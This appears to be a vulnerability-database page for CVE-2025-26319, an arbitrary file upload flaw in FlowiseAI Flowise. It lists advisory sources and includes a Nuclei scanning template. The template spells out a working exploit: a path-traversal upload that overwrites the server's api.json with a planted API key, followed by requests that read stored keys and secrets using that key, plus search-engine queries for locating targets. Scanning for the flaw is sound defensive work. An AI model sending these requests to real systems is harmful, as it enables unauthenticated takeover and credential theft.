| Reporter | Title | Published | Views |
|---|---|---|---|
| bdu_fstec | The vulnerability in the /api/v1/attachments component of Flowise, a software platform for building custom interfaces on top of Language Models (LLMs), allows a malicious actor to upload arbitrary files. | 27 Apr 2026 00:00 | – |
| circl | CVE-2025-26319 | 4 Mar 2025 21:35 | – |
| cnnvd | Flowise code issue vulnerability | 4 Mar 2025 00:00 | – |
| cve | CVE-2025-26319 | 4 Mar 2025 00:00 | – |
| cvelist | CVE-2025-26319 | 4 Mar 2025 00:00 | – |
| github | FlowiseAI Flowise arbitrary file upload vulnerability | 5 Mar 2025 00:30 | – |
| nvd | CVE-2025-26319 | 4 Mar 2025 22:15 | – |
| osv | CVE-2025-26319 | 4 Mar 2025 22:15 | – |
| osv | GHSA-69JQ-QR7W-J7QH FlowiseAI Flowise arbitrary file upload vulnerability | 5 Mar 2025 00:30 | – |
| ptsecurity | PT-2025-9712 | 4 Mar 2025 00:00 | – |
```yaml
id: CVE-2025-26319

info:
  name: FlowiseAI Flowise <= 2.2.6 - Arbitrary File Upload
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    FlowiseAI Flowise version 2.2.6 and below contains an arbitrary file upload vulnerability in the /api/v1/attachments endpoint. This vulnerability allows an unauthenticated attacker to upload files outside the intended directory through path traversal, potentially leading to API key exposure and remote code execution. The vulnerability can be exploited by uploading a malicious file to overwrite the .flowise/api.json configuration file.
  impact: |
    Unauthenticated attackers can exploit path traversal in file uploads to overwrite the api.json configuration file, potentially exposing API keys and achieving remote code execution.
  remediation: |
    Upgrade to FlowiseAI Flowise version 2.2.7 or later, which properly validates file upload paths.
  reference:
    - https://github.com/advisories/GHSA-69jq-qr7w-j7qh
    - https://github.com/FlowiseAI/Flowise
    - https://nvd.nist.gov/vuln/detail/CVE-2025-26319
  classification:
    epss-score: 0.50789
    epss-percentile: 0.98789
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2025-26319
    cwe-id: CWE-434
  metadata:
    verified: true
    max-request: 3
    vendor: FlowiseAI
    product: Flowise
    shodan-query: title:"Flowise"
    fofa-query: title="Flowise"
  tags: cve,cve2025,flowise,fileupload,intrusive,vkev,vuln,ai

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /api/v1/attachments/..%2f..%2f..%2f..%2f..%2froot%2f/.flowise HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydTh0yj8zypRgPT1w

        ------WebKitFormBoundarydTh0yj8zypRgPT1w
        Content-Disposition: form-data; name="files";filename="api.json"
        Content-type: text/plain

        [{
          "keyName":"=",
          "apiKey":"24NHxsKIZi7Ee34rl7FtW3dtW1IuYjFQDegXP_Bn8yQ",
          "apiSecret":"8648f55db62716a6577b565efb66145b9ad8c50884c57ae8d4f03c4cd8b3ee27b1f77804d320f08bac8aa4b0dbf58a39dacbb767eb05efe1e57d5c66e5d48473.af4b3f229bd11ac5",
          "createdAt":"111",
          "id":"1111"
        }]
        ------WebKitFormBoundarydTh0yj8zypRgPT1w--

    matchers:
      - type: word
        part: body
        words:
          - 'name":'
          - 'mimeType":"text/plain'
        condition: and
        internal: true

  - raw:
      - |
        GET /api/v1/apikey HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer 24NHxsKIZi7Ee34rl7FtW3dtW1IuYjFQDegXP_Bn8yQ

      - |
        DELETE /api/v1/apikey/1111 HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer 24NHxsKIZi7Ee34rl7FtW3dtW1IuYjFQDegXP_Bn8yQ

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'apiKey":"'
          - 'apiSecret":'
          - 'chatFlows'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022044be5a31f9b5273199f2d1e40378da803d05b25ba2a5b89ce9372ff43ee5b9d0022100fae58b1d0074efb996b51c48e5ff456d461a33cb0f80ab501018025be2e28c83:922c64590222798bb761d5b6d8e72950
```